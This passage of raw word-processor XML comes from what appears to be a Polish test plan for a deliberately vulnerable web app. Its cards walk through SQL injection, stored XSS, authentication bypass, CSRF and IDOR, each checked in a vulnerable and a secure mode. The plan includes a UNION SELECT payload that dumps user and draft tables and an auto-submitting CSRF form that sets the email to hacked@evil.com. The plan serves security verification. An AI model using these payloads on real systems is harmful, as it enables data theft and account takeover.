                <w:color w:val="B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>' UNION SELECT id, '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draft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' || title, post_content, published, author_username, '', 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FROM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blog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WHERE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published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0E7490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64748B"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>--</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2068" w:name="lst68"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 68. Payload SQL Injection użyty w wyszukiwarce biblioteki. Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2068"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10. </w:t>
      </w:r>
      <w:r>
        <w:t>Przełączyć aplikację w tryb secure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">11. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Powtórzyć sondę logiczną oraz payloady </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sqlite_master</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> i </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>draft</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">12. </w:t>
      </w:r>
      <w:r>
        <w:t>Porównać wynik.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Żądanie techniczne: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?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111827"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>q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z</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111827"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>z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>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_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>'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br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2069" w:name="lst69"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 69. Payload SQL Injection użyty w wyszukiwarce biblioteki. Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2069"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wynik podatny:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> wyszukiwarka działa jak nieautoryzowany panel odczytu bazy. Atakujący najpierw potwierdza wykonanie warunku </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>EXISTS(...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, potem poznaje strukturę tabel przez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sqlite_master</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, wyciąga konta przez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT FROM users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> i ujawnia nieopublikowane wpisy przez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>blog WHERE published=0</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wynik secure:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload nie zmienia logiki zapytania. Jest traktowany jako zwykły tekst w parametrze </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>LIKE</w:t>
      </w:r>
      <w:r>
        <w:t>; nie pojawiają się ani tabele, ani użytkownicy, ani drafty.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kryterium zaliczenia:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ta sama funkcja </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/library</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> działa w obu trybach, ale w secure nie dochodzi do wykonania wstrzykniętej składni SQL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="55" w:name="sec55"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>15.2. Karta A2 - komentarze fan postów / Stored XSS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Warunki wejściowe:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dostępny post </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Miku Expo setlist notes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, użytkownik może wysłać komentarz. Do wizualnego testu można użyć nieszkodliwego HTML, np. nagłówka z tekstem </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>XSS-PWNED</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kroki manualne: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Otworzyć </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/posts/view/1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>W komentarzu wpisać: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047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>h2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style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"color:#be123c"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XSS-PWNED</w:t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047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>h2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</w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2070" w:name="lst70"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 70. Fragment implementacji aplikacji (html). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2070"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:t>Wysłać komentarz.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:t>W vulnerable sprawdzić, czy napis renderuje się jako HTML.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:t>Przełączyć secure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:t>Wysłać ten sam komentarz.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r>
        <w:t>Sprawdzić, czy tagi są widoczne jako tekst albo zostały zneutralizowane.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Żądanie techniczne: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v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x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f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"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>#</w:t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3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"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rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111827"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>X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</w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2071" w:name="lst71"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 71. Żądanie HTTP odtwarzające scenariusz ataku. Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2071"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wynik podatny:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> przeglądarka interpretuje treść komentarza jako HTML. Dla payloadu JavaScript oznacza to wykonanie skryptu w kontekście domeny aplikacji.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wynik secure:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTML jest escapowany i nie wykonuje się jako kod.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kryterium zaliczenia:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> zabezpieczenie działa w realnym wątku komentarzy, a nie na osobnej stronie pokazowej.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="56" w:name="sec56"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>15.3. Karta A3 - login / Broken Authentication</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Warunki wejściowe:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> istnieje konto </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:t>. W trybie vulnerable hasło jest zapisane jawnie, ale logika logowania ignoruje wartość hasła dla istniejącego użytkownika.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kroki manualne: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Otworzyć </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/login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 xml:space="preserve">Wpisać </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> jako login.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Wpisać </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>anything</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> jako hasło.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:t>Zatwierdzić formularz.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:t>Sprawdzić, czy nagłówek pokazuje zalogowanego użytkownika.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:t>Przełączyć secure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r>
        <w:t>Powtórzyć ten sam login i błędne hasło.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">8. </w:t>
      </w:r>
      <w:r>
        <w:t>Sprawdzić, czy aplikacja odrzuca logowanie.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Żądanie techniczne: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x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f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&amp;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br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2072" w:name="lst72"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 72. Żądanie HTTP odtwarzające scenariusz ataku. Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2072"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wynik podatny:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> konto zostaje zalogowane mimo błędnego hasła.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wynik secure:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hasło jest porównywane z bcryptem, a błędna próba jest odrzucana.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kryterium zaliczenia:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> secure blokuje przejęcie konta przez znajomość samego loginu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="57" w:name="sec57"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>15.4. Karta A4 - profile settings / CSRF</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Warunki wejściowe:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> użytkownik </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> jest zalogowany. Funkcja profilu jest dostępna pod </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/profile</w:t>
      </w:r>
      <w:r>
        <w:t>. Ta sama ścieżka działa podatnie albo bezpiecznie w zależności od trybu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kroki manualne: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Zalogować się jako </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>admin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>Otworzyć osobny plik HTML lub stronę z formularzem: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047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>form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method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"POST"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action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"http://localhost:8080/ui/profile"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</w:t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047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>input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name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"new_email"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47857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>value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B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>"hacked@evil.com"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047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>form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047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>script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rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="7C3AED"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>document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forms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0E7490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submit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&lt;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047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>script</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111827"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2073" w:name="lst73"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 73. Fragment implementacji aplikacji (html). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2073"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">W vulnerable sprawdzić, czy email w profilu zmienił się na </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>hacked@evil.com</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:t>Przełączyć secure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:t>Wykonać ten sam atak.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Sprawdzić, czy pojawia się komunikat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>CSRF token validation failed</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r>
        <w:t>Wypełnić normalny formularz profilu, który posiada token, i potwierdzić, że legalna operacja nadal działa.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Żądanie techniczne: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f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k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_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_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_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k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@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v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br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2074" w:name="lst74"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 74. Żądanie HTTP odtwarzające scenariusz ataku. Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2074"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wynik podatny:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> email zmienia się bez intencji użytkownika.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wynik secure:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> brak tokena powoduje HTTP 403, a email zostaje bez zmian.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kryterium zaliczenia:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> endpoint </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/profile</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> jest jedną funkcją, a nie dwoma oddzielnymi ścieżkami testowymi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="58" w:name="sec58"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>15.5. Karta A5 - moderation queue / IDOR</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Warunki wejściowe:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> istnieje post admina o ID 1 oraz konto zwykłego użytkownika </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>user1</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kroki manualne: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Zalogować się jako </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>user1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 xml:space="preserve">Otworzyć </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/moderation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> lub przygotować ręczne żądanie POST.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:t>Spróbować usunąć post admina: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p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k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_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_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br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2075" w:name="lst75"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 75. Żądanie HTTP odtwarzające scenariusz ataku. Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2075"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">W vulnerable sprawdzić, czy post znika lub pojawia się komunikat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Post deleted</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:t>Przełączyć secure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:t>Powtórzyć ten sam POST.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Sprawdzić komunikat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>You can delete only your own posts</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wynik podatny:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dowolny zalogowany użytkownik może usunąć cudzy wpis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wynik secure:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> serwer wymusza właściciela zasobu albo rolę admina.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
